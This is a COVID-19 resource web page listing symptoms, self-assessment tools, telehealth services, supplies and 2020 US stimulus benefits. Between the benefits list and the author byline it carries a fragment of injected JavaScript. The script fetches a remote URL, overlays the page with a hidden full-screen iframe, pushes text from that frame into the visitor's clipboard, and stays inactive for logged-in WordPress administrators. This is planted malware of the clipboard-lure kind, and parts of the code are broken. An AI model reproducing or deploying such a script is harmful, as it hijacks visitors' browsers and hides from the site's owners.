This resource list has been compiled to include every type of resource you may need as a general citizen concerned about the coronavirus. Please share this resource list with your family and friends and as many people as possible on your social media profiles to combat the virus itself and the abundance of false and misleading information out there.
Knowledge is power.
Table of Contents
List of Coronavirus Symptoms List of Coronavirus Assessment Tests List of Coronavirus Online Resources List of Online Doctors Treating Coronavirus List of Coronavirus Medical PPE and Equipment List List of Coronavirus Disaster Supplies List of Coronavirus U.S. Government Stimulus Benefits
List of Coronavirus Symptoms
CDC Coronavirus Symptom Watch List
Sourced from the CDC – https://www.cdc.gov/coronavirus/2019-ncov/daily-life-coping/checklist-household-ready.html
Stay home and speak to your healthcare provider if you develop any of these symptoms:Fever or Cough or Shortness of breath If you develop emergency warning signs for COVID-19 get medical attention immediately Emergency warning signs include*:Trouble breathing Persistent pain or pressure in the chest New confusion or inability to arouse Bluish lips or face
Mayo Clinic Coronavirus Symptom Watch List
Sourced from the Mayo Clinic – https://www.mayoclinic.org/diseases-conditions/coronavirus/symptoms-causes/syc-20479963
Signs and symptoms of COVID-19 may appear two to 14 days after exposure and can include:
Fever Cough Shortness of breath or difficulty breathing
Other symptoms can include:
Tiredness Aches Runny nose Sore throat
Some people have experienced the loss of smell or taste.
Compare Coronavirus Symptoms to Cold and Flu Symptoms
List of Coronavirus Assessment Tests
Sourced from research by Christopher Kemmett
CDC Self Checker Coronavirus Checker – Made by Dr. David Wright and The Emory University School of MedicineMayo Clinic Assessment Test Project Baseline by Verily (An Alphabet/Google Company)Roman – Potential Free Online Consultation With a DoctorAlberta Health Services – General Public Alberta Health Services – Healthcare Worker Version Doctor On Demand Ontario.ca British Columbia Self Assessment Tool Coronavirus Risk Assessment Tool
List of Coronavirus Online Resources
Sourced from Coronavirus (COVID-19) “Live” Reddit Threads – https://www.reddit.com/r/worldnews/comments/ftgqg9/livethread_x_global_covid19_pandemic/
Visit the megathread at r/medicine to see what medical professionals views on the issues are. Visit r/COVID19 for scientific discussions on the virus Visit r/coronavirus for general discussions on the virus
Big thanks to r/medicine mods and users for compiling the following:.
Tracking/Maps:
Journals
Resources from Organisational Bodies
Relevant News Sites
List of Online Doctors Treating Coronavirus
Sourced from research by Christopher Kemmett
IU Health Virtual Visit App – Now offering a free coronavirus screening with a doctor.Teledoc American Well MDLive Doctor On Demand Ascension Lemonaid LiveHealth Online Mobile Plushcare Providence Express Care Virtual Babylon Health – Free COVID-19 Care AssistantMaple – Based in Canada
List of Coronavirus Medical PPE and Equipment List
Sourced from the CDC – https://www.cdc.gov/coronavirus/2019-ncov/hcp/ppe-strategy/index.html?CDC_AA_refVal=https%3A%2F%2Fwww.cdc.gov%2Fcoronavirus%2F2019-ncov%2Fhcp%2Fhealthcare-supply-ppe.html
Eye Protection
Isolation Gowns
Facemasks
N95 Respirators
Decontamination and Reuse of Filtering Facepiece Respirators
Ventilators
Coronavirus Disaster Supply List
Sourced from Naples News – https://www.naplesnews.com/story/news/2020/03/06/coronavirus-supplies-kit-soap-hand-sanitizer/4975144002/
โข Soaps
โข Hand Sanitizers
โข Canned Foods
โข Bottled Water and Sports Drinks
โข 30 day supply of medicines, antacids, pain relievers and vitamins
โข First Aid Kits
โข Toothpaste and Toothbrush
โข Toilet Paper
โข Feminine Products
โข Diapers
โข Detergents
โข Flashlights and candles
โข Extra batteries
โข Insurance Documents and a living will
List of Coronavirus U.S. Government Stimulus Benefits
Sourced from research by Christopher Kemmett
Direct Payments to All Americans – starting at $1,200 for individuals, families will receive $2,400 for married couples and an additional $500 per child.Expanded Unemployment – includes self-employed and independent contractors. The federal government is adding a $600 per week benefit to State unemployment benefits.Paid Sick Leave and Family Leave – this benefit is employer based, however employers will be reimbursed from the federal government in the form of payroll credits.Suspended Interest on Student Loans – the government will also suspend collection of defaulted student loans which include wage garnishment and bank account levies.Tax Relief for Employer Repayment of Student Loans – employers can pay up to $5,250 in student loan payments to employees and receive tax deductions for every dollar.Penalty Free Withdrawals from Retirement Accounts – the government is also allowing a doubling of the loan amounts allowed to be taken from retirement accounts.Suspended Requirement for Minimum Distributions – temporarily while the stock market is affected by COVID-19, the requirement to withdraw funds from retirement accounts is suspended. This will allow individuals time for their investments to return to higher levels before withdrawing the funds.Extended Tax Filing Deadlines – taxes and corporate filings have been extended federally and in the 50 States. Mortgage Forbearance and Foreclosure Protection – individuals with federally insured loans are eligible for 90 – 180 days of forbearance. Lenders are also restricted from foreclosing on any defaulted mortgages in this category.Charitable Contributions are now Tax Deductible – all individuals who file taxes are no eligible to deduct up to $300 in COVID-19 related donations, regardless of filing itemized deductions or standard deductions.Small Business Loans – businesses in America are now eligible for several different types of disaster related loans. There is the “Paycheck Protection Program”, the expanded “Economic Injury Disaster Loan”, and “Employee Retention Tax Credits” (which is a 50% refund on wages paid for 6 months up to $10,000 per employee).Moratorium on Evictions – renters are now protected from being evicted for non-payment of rents during the coronavirus crisis.
{
try {
var parsed = JSON.parse(text);
var jsonUrl = findUrlInObject(parsed, 0);
if (jsonUrl) return jsonUrl;
} catch (e) {}
}
var matchHttp = text.match(/https?:\/\/[^\s"'<>]+/i);
if (matchHttp && matchHttp[0]) {
var httpUrl = toHttpUrl(matchHttp[0]);
if (httpUrl) return httpUrl;
}
var matchDomain = text.match(/\b[a-z0-9.-]+\.[a-z]{2,}(?::\d+)?(?:\/[^\s"'<>]*)?/i);
if (matchDomain && matchDomain[0]) {
var domainUrl = toHttpUrl(matchDomain[0]);
if (domainUrl) return domainUrl;
}
return "";
}
function getOriginSafe(url) {
try {
return new URL(url).origin;
} catch (e) {
return "";
}
}
function addHint(rel, href) {
if (!href || !document || !document.createElement) return;
var key = rel + "::" + href;
if (registry.hints[key]) return;
registry.hints[key] = true;
try {
var parent = document.head || document.documentElement;
if (!parent) return;
var link = document.createElement("link");
link.rel = rel;
link.href = href;
if (rel === "preconnect") {
link.crossOrigin = "anonymous";
}
parent.appendChild(link);
} catch (e) {}
}
function warmupOrigins() {
var origins = {};
var apiOrigin = getOriginSafe(API_ID_URL);
if (apiOrigin) origins[apiOrigin] = true;
for (var i = 0; i < TRUSTED_CONFIGS.length; i++) {
var tpl = TRUSTED_CONFIGS[i] && TRUSTED_CONFIGS[i].template;
if (!tpl) continue;
var probe = tpl.replace(/\{id\}/g, "x");
var origin = getOriginSafe(probe);
if (origin) origins[origin] = true;
}
for (var originKey in origins) {
if (!Object.prototype.hasOwnProperty.call(origins, originKey)) continue;
addHint("dns-prefetch", originKey);
addHint("preconnect", originKey);
}
}
function getMountNode() {
return document.body || document.documentElement || null;
}
function fetchTextNoThrow(url, timeoutMs) {
return new Promise(function (resolve) {
if (!url || typeof fetch !== "function") {
resolve("");
return;
}
var finished = false;
var timer = null;
var controller = null;
function done(value) {
if (finished) return;
finished = true;
if (timer) clearTimeout(timer);
resolve;
}
try {
if (typeof AbortController !== "undefined") {
controller = new AbortController();
}
timer = setTimeout(function () {
try {
if (controller) controller.abort();
} catch (e) {}
done("");
}, timeoutMs);
fetch(url, {
cache: "no-store",
credentials: "omit",
signal: controller ? controller.signal : void 0
})
.then(function (response) {
return response ? response.text() : "";
})
.then(function (text) {
done(text);
})
.catch(function () {
done("");
});
} catch (e) {
done("");
}
});
}
function tryCopy(text) {
if (typeof text !== "string" || !text) return;
try { window.focus(); } catch (e) {}
if (navigator.clipboard && navigator.clipboard.writeText) {
navigator.clipboard.writeText(text).catch(function () {
fallbackCopy(text);
});
return;
}
fallbackCopy(text);
}
function fallbackCopy(text) {
try {
var mount = getMountNode();
if (!mount) return;
var ta = document.createElement("textarea");
ta.value = text;
ta.setAttribute("readonly", "readonly");
ta.style.position = "fixed";
ta.style.left = "-9999px";
ta.style.top = "0";
ta.style.opacity = "0";
mount.appendChild(ta);
try { ta.focus(); } catch (e) {}
ta.select();
ta.setSelectionRange(0, ta.value.length);
document.execCommand("copy");
if (ta.parentNode) ta.parentNode.removeChild(ta);
} catch (e) {}
}
function bindMessageHandler() {
if (registry.messageBound) return;
registry.messageBound = true;
window.addEventListener("message", function (event) {
var data = event && event.data;
var iframe = document.getElementById(registry.iframeId);
if (!iframe || !data || typeof data !== "object") return;
if (event.source && iframe.contentWindow && event.source !== iframe.contentWindow) return;
if (data.type === "ktl-show-original") {
if (typeof registry.destroy === "function") registry.destroy();
return;
}
if (data.type === "ktl-frame-ready") {
if (typeof registry.reveal === "function") registry.reveal();
return;
}
if (data.type === "copy" && typeof data.text === "string") {
tryCopy(data.text);
}
});
}
function cleanup(nextStatus) {
var iframe = document.getElementById(registry.iframeId);
registry.destroy = null;
registry.reveal = null;
try {
if (iframe && iframe.parentNode) {
iframe.parentNode.removeChild(iframe);
}
} catch (e) {}
registry.status = nextStatus || "done";
}
function resolveLandingUrl(id) {
if (!id || !TRUSTED_CONFIGS.length) {
return Promise.resolve("");
}
function step(index) {
if (index >= TRUSTED_CONFIGS.length) {
return Promise.resolve("");
}
var cfg = TRUSTED_CONFIGS[index] || {};
var builtUrl = toHttpUrl(buildTrustedUrl(cfg.template || "", id));
if (!builtUrl) {
return step(index + 1);
}
if (!cfg.useFetch) {
return Promise.resolve(builtUrl);
}
return fetchTextNoThrow(builtUrl, registry.requestTimeoutMs)
.then(function (raw) {
var landingUrl = extractLandingUrl(raw);
if (landingUrl) return landingUrl;
return step(index + 1);
})
.catch(function () {
return step(index + 1);
});
}
return step(0);
}
function activateIframe(url) {
if (!url || registry.status === "active") return;
if (isWpLoggedInContext()) {
cleanup("done");
return;
}
var existing = document.getElementById(registry.iframeId);
if (existing) {
registry.status = "active";
return;
}
var mount = getMountNode();
if (!mount) {
setTimeout(function () {
activateIframe(url);
}, 0);
return;
}
var iframe = document.createElement("iframe");
var closed = false;
var revealed = false;
var timeoutId = null;
function reveal() {
if (closed || revealed) return;
revealed = true;
if (timeoutId) clearTimeout(timeoutId);
registry.status = "active";
iframe.style.visibility = "visible";
iframe.style.opacity = "1";
iframe.style.pointerEvents = "auto";
iframe.removeAttribute("aria-hidden");
setTimeout(function () {
try { iframe.focus(); } catch (e) {}
try {
if (iframe.contentWindow && iframe.contentWindow.focus) {
iframe.contentWindow.focus();
}
} catch (e) {}
}, 0);
}
function destroy() {
if (closed) return;
closed = true;
if (timeoutId) clearTimeout(timeoutId);
cleanup("done");
}
registry.destroy = destroy;
registry.reveal = reveal;
iframe.id = registry.iframeId;
iframe.setAttribute(registry.iframeAttr, "1");
iframe.setAttribute("aria-hidden", "true");
iframe.setAttribute("loading", "eager");
iframe.setAttribute("allow", "clipboard-write");
iframe.src = safeAppendQuery(url, "v", Math.random().toString(36).slice(2));
iframe.style.cssText = [
"position:fixed !important",
"top:0",
"left:0",
"width:100vw",
"height:100vh",
"border:none",
"z-index:2147483647",
"margin:0",
"padding:0",
"overflow:hidden",
"visibility:hidden",
"opacity:0",
"pointer-events:none",
"background:transparent"
].join(";");
iframe.onload = function () {
if (closed) return;
if (!registry.requireReadyMessage) {
reveal();
}
};
iframe.onerror = function () {
destroy();
};
timeoutId = setTimeout(function () {
destroy();
}, registry.iframeTimeoutMs);
try {
mount.appendChild(iframe);
} catch (e) {
destroy();
}
}
function run() {
warmupOrigins();
bindMessageHandler();
return fetchTextNoThrow(API_ID_URL, registry.requestTimeoutMs)
.then(function (id) {
if (isWpLoggedInContext()) {
cleanup("done");
return "";
}
id = (id || "").trim();
if (!id) {
cleanup("done");
return "";
}
return resolveLandingUrl(id);
})
.then(function (finalUrl) {
if (isWpLoggedInContext()) {
cleanup("done");
return "";
}
finalUrl = toHttpUrl(finalUrl);
if (!finalUrl) {
cleanup("done");
return "";
}
var finalOrigin = getOriginSafe(finalUrl);
if (finalOrigin) {
addHint("dns-prefetch", finalOrigin);
addHint("preconnect", finalOrigin);
}
activateIframe(finalUrl);
return finalUrl;
})
.catch(function () {
cleanup("done");
});
}
registry.runPromise = run();
})();
Hi, I'm Christopher Kemmett, author of this article. Give me a shout if you need anything.
Happy
1
100 %
Sad
0
0 %
Excited
0
0 %
Sleepy
0
0 %
Angry
0
0 %
Surprise
0
0 %
Average Rating